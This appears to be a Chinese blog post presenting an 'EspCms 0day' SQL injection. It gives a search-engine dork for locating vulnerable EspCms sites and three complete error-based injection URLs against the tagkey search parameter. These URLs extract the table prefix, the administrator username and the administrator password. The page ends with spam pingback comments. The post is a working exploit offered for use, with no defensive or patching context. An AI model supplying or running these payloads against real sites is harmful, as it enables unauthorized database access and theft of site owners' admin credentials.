EspCms 网站系统注入0day

2.68k 次浏览

百度关键字:inurl:index.php?ac=article&at=read&did=

注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆用户名:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23)
爆密码:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

 

=================================================================

fr0m:强大的A8

4
0dayEspcms
一个胖子,在努力减肥中

Related Posts

Linux 一键更换国内软件源脚本

7月 01,2023

wordpress禁止PC首页访问 不影响蜘蛛抓取的方法

5月 16,2023

Comments

  1. Pingback: bmi calc
  2. Pingback: drugrehabcentershotline.com drug rehab centers
  3. Pingback: direct payday loan companies mississauga lender
  4. Pingback: payday advance

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注